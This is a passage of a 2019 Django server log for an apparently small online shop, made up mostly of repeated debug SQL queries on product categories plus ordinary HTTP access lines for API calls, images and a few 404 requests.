34, 277421, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 06:27:34,291 utils 20136 140506411554560 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [16/Dec/2019 06:27:34] "GET /jsi18n/ HTTP/1.0" 200 3223 Not Found: /robots.txt [16/Dec/2019 06:31:11] "GET /robots.txt HTTP/1.0" 404 6624 [16/Dec/2019 06:31:27] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [16/Dec/2019 06:31:55] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=119 HTTP/1.0" 404 6705 Not Found: /newslist.asp [16/Dec/2019 06:32:15] "GET /newslist.asp?type=4&id=1276 HTTP/1.0" 404 6649 [16/Dec/2019 06:36:29] "GET / HTTP/1.0" 302 0 [16/Dec/2019 06:41:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 06:43:09,628 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 06:43:09,636 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 06:43:09,640 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 06:43:09,643 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:43:09,646 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 06:43:09,648 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 06:43:09,651 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 06:43:09,653 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 06:43:09,655 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 06:43:09,659 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 06:43:09,661 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 06:43:09,665 utils 20136 140506411554560 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 06:43:09,669 utils 20136 140506411554560 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 06:43:09,671 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 06:43:09,675 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 06:43:09,677 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 06:43:09,680 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 06:43:09,682 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 06:43:09,684 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 06:43:09,688 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 06:43:09,690 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 06:43:09,695 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 06:43:09,697 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 06:43:09,700 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 06:43:09,702 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 06:43:09,706 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 06:43:09,708 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 06:43:09,711 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 06:43:09,713 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 06:43:09,715 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 06:43:09,719 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 06:43:09,721 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 06:43:09,723 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 06:43:09,726 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 06:43:09,728 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 06:43:09,732 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 06:43:09,734 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 06:43:09,736 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 06:43:09,739 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 06:43:09,741 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 06:43:09,743 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 06:43:09,746 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 06:43:09,748 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 06:43:09,751 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 06:43:09,753 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 06:43:09,756 utils 20136 140506411554560 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 06:43:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:10] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:11] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:12] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:12] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:12] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:12] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:12] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:12] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [16/Dec/2019 06:43:13] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 [16/Dec/2019 06:46:34] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 06:49:14,533 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 06:49:14,541 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 06:49:14,544 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 06:49:14,546 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:49:14,550 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 06:49:14,552 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 06:49:14,554 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 06:49:14,556 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 